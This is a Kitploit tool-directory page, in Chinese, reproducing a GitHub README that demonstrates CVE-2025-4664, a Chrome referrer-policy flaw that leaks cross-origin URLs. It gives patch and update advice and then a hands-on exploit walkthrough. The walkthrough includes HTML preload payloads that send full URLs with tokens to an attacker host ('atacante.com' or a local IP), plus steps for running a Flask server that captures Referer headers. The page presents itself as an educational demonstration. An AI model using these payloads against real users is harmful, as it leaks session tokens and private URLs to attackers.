Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-4664 — CVE-2025-4664的教育演示,这是一个Chrome Loader漏洞,通过操纵referrer-policy实现跨源数据泄露。包括受害者HTML页面和攻击者Flask服务器,用于动手利用模拟。 | Kitploit
工具/GitHubGitHub/speinador/cve-2025-4664
漏洞分析漏洞利用信息收集钓鱼攻击Web安全学习与教育
GitHubspeinador/cve-2025-4664

CVE-2025-4664

CVE-2025-4664的教育演示,这是一个Chrome Loader漏洞,通过操纵referrer-policy实现跨源数据泄露。包括受害者HTML页面和攻击者Flask服务器,用于动手利用模拟。

查看仓库
131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔒 漏洞 CVE-2025-4664

CVE-2025-4664 漏洞是 Google Chrome Loader 组件中识别出的一个高严重性安全缺陷,存在于 136.0.7103.113 之前的版本中。该问题允许远程攻击者通过特制的 HTML 页面泄露跨源数据,从而可能危及会话令牌或身份验证凭据等敏感信息。


❓ 该漏洞是什么?

该缺陷源于 Chrome Loader 组件中安全策略的不当实现。具体而言,Chrome 会在子资源(如图像或脚本)请求中解析 HTTP Link 头中的 referrer-policy 指令,而其他浏览器则不会这样做。攻击者可以利用这一点,设置一个限制较宽松的策略(如 unsafe-url),导致 Chrome 将完整 URL(包括敏感参数)泄露给攻击者控制的域名。


⚠️ 影响与积极利用

该漏洞已在真实环境中被积极利用,促使美国网络安全与基础设施安全局(CISA)将其列入已知被利用漏洞目录(KEV)。CISA 已将 2025 年 6 月 5 日设定为联邦机构应用相应修复程序的截止日期。


🛡️ 缓解措施与建议

Google 已发布更新以修复此漏洞,涉及以下版本:

  • 🖥️ Windows 和 Mac:136.0.7103.113/.114
  • 🐧 Linux:136.0.7103.113

强烈建议所有用户将 Chrome 浏览器更新到可用的最新版本。要检查并应用更新:

  1. 🔍 打开 Chrome,点击右上角的三个点菜单。
  2. ⚙️ 选择“帮助”,然后点击“关于 Google Chrome”。
  3. ⬇️ Chrome 将自动检查更新并在可用时安装。
  4. 🔄 更新后,重启浏览器以应用更改。

此外,基于 Chromium 的浏览器(如 Microsoft Edge、Brave、Opera 和 Vivaldi)用户也应关注相应的更新,因为这些浏览器可能受到该漏洞的影响。

保持浏览器更新对于防范活跃的安全威胁和保护个人信息至关重要。


🕵️‍♂️ 如何利用该漏洞?

CVE-2025-4664 漏洞通过操纵 Google Chrome 在从 HTML 链接加载子资源(如图像、脚本等)时处理引用策略(referrer-policy)的方式来进行利用。


⚙️ 技术上的利用方式:

  1. 🌐 创建恶意网站:
    攻击者创建一个网站,在其 HTTP 头中包含如下 HTML 链接:

    <link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
    
  2. 🔧 操纵 referrer-policy: 在大多数浏览器中,<link> 标签中的此 referrerpolicy 不会应用于所加载的资源。然而,Chrome 确实会应用它,这正是问题的核心。

  3. 📤 Referer 泄露: 当受害者的浏览器(Chrome)从 victima.com 加载资源时,会将源站点的完整 URL 作为 Referer 头发送,其中可能包含:

  • 会话令牌(?token=ABC123)
  • 敏感参数(?user=admin&password=1234)
  • 私有 URL
  1. 🎯 在攻击者服务器上接收: 攻击者可以将资源的目标设置为由其控制的 URL,例如:
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">

当受害者访问该资源时,Chrome 会将其完整 URL 作为 Referer 发送到攻击者的服务器。

  1. 🕵️ 信息窃取: 攻击者的服务器记录 HTTP 头,并获取受害者 URL 的完整内容。这可能包括机密数据、访问令牌,甚至内部 API 的 URL。

✔️ 攻击生效所需的条件:

  • 👤 受害者使用未打补丁的 Google Chrome。
  • 🔑 受害者的网站在 URL 中包含敏感信息(如身份验证令牌)。
  • 🎣 攻击者设法让受害者的浏览器从其域名加载资源(例如,通过网络钓鱼、恶意广告或重定向)。

🧪 攻击的实际示例(简化版):

1- 攻击者向受害者发送一个指向以下地址的链接:

https://atacante.com/pagina-maliciosa.html
  1. 该页面加载如下内容:
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
  1. Chrome 浏览器发送:
Referer: https://victima.com/perfil?token=ABC123

到攻击者域名,从而暴露令牌。

个人资料图片

项目文件

🖥️ index.html — 受害者文件

该文件模拟攻击的受害者,是一个简化的 HTML 演示,用于展示如何使用恶意的 标签利用 CVE-2025-4664 漏洞:

  • 代表易受攻击的界面。
  • 用于演示该漏洞在受控环境中如何运作。
  • 包含攻击者可根据 CVE-2025-4664 利用的元素。
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
  <link rel="preload" as="image"
        href="https://victima.com/perfil?token=ABC123"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
  <p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>

这段代码的作用:

  • <link> 标签被配置为从 victima.com 预加载一张包含 URL 令牌的图像。
  • 使用 referrerpolicy="unsafe-url" 时,Chrome 会将当前页面的完整 URL 作为 Referer 发送到受害者域名。
  • 如果图像指向攻击者自己的服务器,攻击者可以在其日志中捕获该完整 URL。

🐍 servidor_atacante.py — 攻击者文件

通过此脚本,可以使用一个小的 Python 服务器自动化攻击以捕获 Referer。以下是一个使用 Flask 模拟接收数据的攻击者服务器的示例:

  • 模拟针对由 index.html 代表的受害者的攻击。
  • 实施该漏洞中描述的技术。
  • 用于测试和验证所实施的缓解措施。

如何使用:

  1. 将该代码保存为 servidor_atacante.py。
  2. 如果尚未安装 Flask,请安装:
pip install flask
  1. 运行服务器:
python servidor_atacante.py
  1. 然后按如下方式修改 HTML 演示:
<link rel="preload" as="image"
      href="http://<tu_IP>:8080/captura.jpg"
      referrerpolicy="unsafe-url">

将 <tu_IP> 替换为运行该脚本的服务器的公网或本地 IP。


💪 如何使用该项目

🛠️ 1. 运行 Flask 服务器

  1. 打开终端(PowerShell 或 CMD)。

  2. 导航到文件所在文件夹:

cd "C:\Users\Sebas\Desktop\servidor_atacante"
  1. 运行 Flask:
python servidor_atacante.py
  1. 你将看到类似以下内容:
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080

🌐 2. 创建并打开 index.html(模拟受害者)

在同一个文件夹(C:\Users\Sebas\Desktop\servidor_atacante)中,创建一个名为 index.html 的文件,内容如下:

<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Simula el ataque -->
  <link rel="preload" as="image"
        href="http://192.168.1.35:8080/captura.jpg"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Simulación CVE-2025-4664</h1>
  <p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>

✅ 重要: 确保 IP(192.168.1.35)与 Flask 显示的本地 IP 一致。如果不同,请在 HTML 中更改。

🚀 3. 使用敏感参数打开 index.html

  1. 打开 Chrome。

  2. 在地址栏中输入:

file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
  1. 按回车键。

  2. 📥 在服务器上查看结果 在 Flask 控制台中,你应该会看到类似以下内容:

[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123

[Carpeta destino]:将此参数修改为我们保存文件的位置。

🎯 这意味着浏览器已将完整的 Referer 发送给了攻击者!


🧑‍🏫 作者

该说明由 Sebastian Peinador 编写,用于进攻性网络安全的教学和研究目的。


📄 许可证

本材料根据 MIT 许可证分发。


如果对你有用,别忘了给仓库点 ⭐ 或分享它!

下载工具